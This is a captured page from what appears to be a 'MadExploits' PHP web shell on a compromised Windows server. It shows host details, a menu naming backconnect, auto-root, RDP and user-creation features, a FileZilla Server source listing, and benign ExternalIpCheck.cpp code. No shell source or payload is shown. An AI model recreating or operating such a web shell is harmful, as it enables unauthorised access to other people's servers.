Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
FileZillaFTP /
source /
[ HOME SHELL ]
Name
Size
Permission
Action
hash_algorithms
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
install
[ DIR ]
drwxrwxrwx
interface
[ DIR ]
drwxrwxrwx
misc
[ DIR ]
drwxrwxrwx
res
[ DIR ]
drwxrwxrwx
tinyxml
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Accounts.cpp
12.2
KB
-rw-rw-rw-
Accounts.h
2.12
KB
-rw-rw-rw-
AdminInterface.cpp
3.1
KB
-rw-rw-rw-
AdminInterface.h
1.77
KB
-rw-rw-rw-
AdminListenSocket.cpp
1.64
KB
-rw-rw-rw-
AdminListenSocket.h
1.58
KB
-rw-rw-rw-
AdminSocket.cpp
9.85
KB
-rw-rw-rw-
AdminSocket.h
2.1
KB
-rw-rw-rw-
AsyncGssSocketLayer.cpp
30.35
KB
-rw-rw-rw-
AsyncGssSocketLayer.h
4.76
KB
-rw-rw-rw-
AsyncSocketEx.cpp
51.94
KB
-rw-rw-rw-
AsyncSocketEx.h
11.75
KB
-rw-rw-rw-
AsyncSocketExLayer.cpp
26.22
KB
-rw-rw-rw-
AsyncSocketExLayer.h
7
KB
-rw-rw-rw-
AsyncSslSocketLayer.cpp
60.12
KB
-rw-rw-rw-
AsyncSslSocketLayer.h
8.94
KB
-rw-rw-rw-
ControlSocket.cpp
96.33
KB
-rw-rw-rw-
ControlSocket.h
4.74
KB
-rw-rw-rw-
ExternalIpCheck.cpp
7.82
KB
-rw-rw-rw-
ExternalIpCheck.h
1.85
KB
-rw-rw-rw-
FileLogger.cpp
6.68
KB
-rw-rw-rw-
FileLogger.h
1.35
KB
-rw-rw-rw-
FileZilla server.rc
2.65
KB
-rw-rw-rw-
FileZilla server.sln
2.75
KB
-rw-rw-rw-
FileZilla server.vcproj
39.95
KB
-rw-rw-rw-
ListenSocket.cpp
4.23
KB
-rw-rw-rw-
ListenSocket.h
2.29
KB
-rw-rw-rw-
MFC64bitFix.cpp
2.56
KB
-rw-rw-rw-
MFC64bitFix.h
1.45
KB
-rw-rw-rw-
OptionLimits.h
1022
B
-rw-rw-rw-
OptionTypes.h
6.46
KB
-rw-rw-rw-
Options.cpp
31.81
KB
-rw-rw-rw-
Options.h
2.59
KB
-rw-rw-rw-
Permissions.cpp
61.53
KB
-rw-rw-rw-
Permissions.h
6.82
KB
-rw-rw-rw-
Server.cpp
42.34
KB
-rw-rw-rw-
Server.h
2.05
KB
-rw-rw-rw-
ServerThread.cpp
26.13
KB
-rw-rw-rw-
ServerThread.h
4.21
KB
-rw-rw-rw-
Service.cpp
15.23
KB
-rw-rw-rw-
SpeedLimit.cpp
6.87
KB
-rw-rw-rw-
SpeedLimit.h
1.96
KB
-rw-rw-rw-
StdAfx.cpp
4.41
KB
-rw-rw-rw-
StdAfx.h
4.93
KB
-rw-rw-rw-
Thread.cpp
2.85
KB
-rw-rw-rw-
Thread.h
1.87
KB
-rw-rw-rw-
TransferSocket.cpp
28.72
KB
-rw-rw-rw-
TransferSocket.h
3.62
KB
-rw-rw-rw-
autobanmanager.cpp
3.44
KB
-rw-rw-rw-
autobanmanager.h
1.46
KB
-rw-rw-rw-
config.h
1.52
KB
-rw-rw-rw-
conversion.cpp
1.95
KB
-rw-rw-rw-
conversion.h
435
B
-rw-rw-rw-
defs.h
1.03
KB
-rw-rw-rw-
hash_thread.cpp
4.79
KB
-rw-rw-rw-
hash_thread.h
930
B
-rw-rw-rw-
iputils.cpp
10.87
KB
-rw-rw-rw-
iputils.h
1.32
KB
-rw-rw-rw-
platform.h
1.43
KB
-rw-rw-rw-
resource.h
515
B
-rw-rw-rw-
version.cpp
4.32
KB
-rw-rw-rw-
version.h
881
B
-rw-rw-rw-
xml_utils.cpp
487
B
-rw-rw-rw-
xml_utils.h
236
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ExternalIpCheck.cpp
// FileZilla Server - a Windows ftp server // Copyright (C) 2002-2004 - Tim Kosse <tim.kosse@gmx.de> // This program is free software; you can redistribute it and/or // modify it under the terms of the GNU General Public License // as published by the Free Software Foundation; either version 2 // of the License, or (at your option) any later version. // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // You should have received a copy of the GNU General Public License // along with this program; if not, write to the Free Software // Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. #include "stdafx.h" #include "ExternalIpCheck.h" #include "ServerThread.h" #include "Options.h" ////////////////////////////////////////////////////////////////////// // Konstruktion/Destruktion ////////////////////////////////////////////////////////////////////// #define TIMERINTERVAL 30 CExternalIpCheck::CExternalIpCheck(CServerThread *pOwner) { ASSERT(pOwner); m_pOwner = pOwner; m_bActive = FALSE; m_nRetryCount = 0; m_nTimerID = SetTimer(0, 0, TIMERINTERVAL * 1000, 0); m_bTriggerUpdateCalled = FALSE; m_nFailedConnections = 0; m_nElapsedSeconds = 0; if (!m_pOwner->m_pOptions->GetOptionVal(OPTION_CUSTOMPASVIPTYPE)) return; if (m_pOwner->m_pOptions->GetOptionVal(OPTION_CUSTOMPASVIPTYPE) == 2) Start(); else if (m_pOwner->m_pOptions->GetOptionVal(OPTION_CUSTOMPASVIPTYPE) == 1) { CStdString hostname = m_pOwner->m_pOptions->GetOption(OPTION_CUSTOMPASVIP); SOCKADDR_IN sockAddr; memset(&sockAddr, 0, sizeof(sockAddr)); sockAddr.sin_family = AF_INET; #ifdef _UNICODE sockAddr.sin_addr.s_addr = inet_addr(ConvToLocal(hostname)); #else sockAddr.sin_addr.s_addr = inet_addr(hostname); #endif if (sockAddr.sin_addr.s_addr == INADDR_NONE) { LPHOSTENT lphost; #ifdef _UNICODE lphost = gethostbyname(ConvToLocal(hostname)); #else lphost = gethostbyname(hostname); #endif if (lphost != NULL) sockAddr.sin_addr.s_addr = ((LPIN_ADDR)lphost->h_addr)->s_addr; else { Close(); m_nRetryCount++; m_bActive = FALSE; return; } } const char *ip = inet_ntoa(sockAddr.sin_addr); if (!ip) return; #ifdef _UNICODE m_IP = ConvFromLocal(ip); #else m_IP = ip; #endif } } CExternalIpCheck::~CExternalIpCheck() { Close(); } void CExternalIpCheck::OnReceive(int nErrorCode) { if (!m_bActive) return; if (nErrorCode) { m_bActive = FALSE; Close(); m_nRetryCount++; return; } char buffer[1000]; int len = Receive(buffer, 999); if (len == SOCKET_ERROR) { if (GetLastError() == WSAEWOULDBLOCK) return; Close(); m_nRetryCount++; m_bActive = FALSE; return; } buffer[len] = 0; char *p = strstr(buffer, "\r\n\r\n"); if (!p) p = strstr(buffer, "\n\n"); if (!p) { Close(); m_nRetryCount++; m_bActive = FALSE; return; } while (*p && (*p == '\n' || *p == '\r')) p++; if (!*p) { Close(); m_nRetryCount++; m_bActive = FALSE; return; } char * ip = p; while (*p && *p != '\n' && *p != '\r') p++; *p = 0; SOCKADDR_IN sockAddr; memset(&sockAddr,0,sizeof(sockAddr)); sockAddr.sin_family = AF_INET; sockAddr.sin_addr.s_addr = inet_addr(ip); if (sockAddr.sin_addr.s_addr == INADDR_NONE) { LPHOSTENT lphost; lphost = gethostbyname(ip); if (lphost != NULL) sockAddr.sin_addr.s_addr = ((LPIN_ADDR)lphost->h_addr)->s_addr; else { Close(); m_nRetryCount++; m_bActive = FALSE; return; } } ip = inet_ntoa(sockAddr.sin_addr); if (!ip) { Close(); m_nRetryCount++; m_bActive = FALSE; return; } #ifdef _UNICODE m_IP = ConvFromLocal(ip); #else m_IP = ip; #endif m_nFailedConnections = 0; Close(); m_nRetryCount = 0; m_bActive = FALSE; } void CExternalIpCheck::OnConnect(int nErrorCode) { if (!m_bActive) return; if (nErrorCode) { m_bActive = FALSE; Close(); m_nRetryCount++; return; } CStdStringA address = "GET " + m_pOwner->m_pOptions->GetOption(OPTION_CUSTOMPASVIPSERVER) + " HTTP/1.0\r\nUser-Agent: FileZilla Server\r\n\r\n"; const char *buffer = address; int len = strlen(buffer); if (Send(buffer, len) != len) { m_bActive = FALSE; Close(); m_nRetryCount++; } OnReceive(0); } void CExternalIpCheck::OnTimer() { if (m_nElapsedSeconds <= 1000000) m_nElapsedSeconds += TIMERINTERVAL; if (!m_pOwner->m_pOptions->GetOptionVal(OPTION_CUSTOMPASVIPTYPE)) { m_nRetryCount = 0; Close(); m_bActive = FALSE; return; } else if (m_pOwner->m_pOptions->GetOptionVal(OPTION_CUSTOMPASVIPTYPE) == 1) { m_nRetryCount = 0; Close(); m_bActive = FALSE; CStdString hostname = m_pOwner->m_pOptions->GetOption(OPTION_CUSTOMPASVIP); SOCKADDR_IN sockAddr; memset(&sockAddr,0,sizeof(sockAddr)); sockAddr.sin_family = AF_INET; #ifdef _UNICODE sockAddr.sin_addr.s_addr = inet_addr(ConvToLocal(hostname)); #else sockAddr.sin_addr.s_addr = inet_addr(hostname); #endif if (sockAddr.sin_addr.s_addr == INADDR_NONE) { LPHOSTENT lphost; #ifdef _UNICODE lphost = gethostbyname(ConvToLocal(hostname)); #else lphost = gethostbyname(hostname); #endif if (lphost != NULL) sockAddr.sin_addr.s_addr = ((LPIN_ADDR)lphost->h_addr)->s_addr; else { Close(); m_nRetryCount++; m_bActive = FALSE; return; } } const char *ip = inet_ntoa(sockAddr.sin_addr); if (!ip) return; #ifdef _UNICODE m_IP = ConvFromLocal(ip); #else m_IP = ip; #endif m_nFailedConnections = 0; return; } if (!m_bActive && m_nRetryCount) { if (m_nElapsedSeconds > 60 && m_nRetryCount < 5) { Start(); return; } else if (m_nElapsedSeconds > 300 && m_nRetryCount < 10) { Start(); return; } else if (m_nElapsedSeconds > 900 && m_nRetryCount < 20) { Start(); return; } else if (m_nElapsedSeconds > 3600) { Start(); return; } } else if (m_bActive) { if (m_nElapsedSeconds > 30) { m_bActive = FALSE; Close(); m_nRetryCount++; m_nElapsedSeconds = 0; } } else { if (m_nElapsedSeconds > 300 && m_bTriggerUpdateCalled) Start(); else if (m_nElapsedSeconds > 3600) Start(); } } void CExternalIpCheck::OnClose(int nErrorCode) { if (m_bActive) { m_bActive = FALSE; Close(); m_nRetryCount++; } } void CExternalIpCheck::Start() { if (m_bActive) return; CStdString address = m_pOwner->m_pOptions->GetOption(OPTION_CUSTOMPASVIPSERVER); if (address.Left(7) == _T("http://")) address = address.Mid(7); int pos = address.Find('/'); if (pos != -1) address = address.Left(pos); if (address == _T("")) return; m_bTriggerUpdateCalled = FALSE; m_nElapsedSeconds = 0; Create(); BOOL res = Connect(address, 80); if (res == SOCKET_ERROR && GetLastError() != WSAEWOULDBLOCK) m_nRetryCount++; else m_bActive = TRUE; } void CExternalIpCheck::TriggerUpdate() { if (m_bActive) return; m_bTriggerUpdateCalled = TRUE; if (m_nFailedConnections < 100000) m_nFailedConnections++; } CStdString CExternalIpCheck::GetIP(const CStdString& localIP) { if (!m_pOwner->m_pOptions->GetOptionVal(OPTION_CUSTOMPASVIPTYPE)) return _T(""); CStdString ip; switch (m_pOwner->m_pOptions->GetOptionVal(OPTION_CUSTOMPASVIPTYPE)) { case 0: return _T(""); case 2: if (!m_bActive && !m_nRetryCount && localIP != _T("")) { if (localIP == m_IP) m_nElapsedSeconds = 0; } case 1: ip = m_IP; break; } return ip; }
Close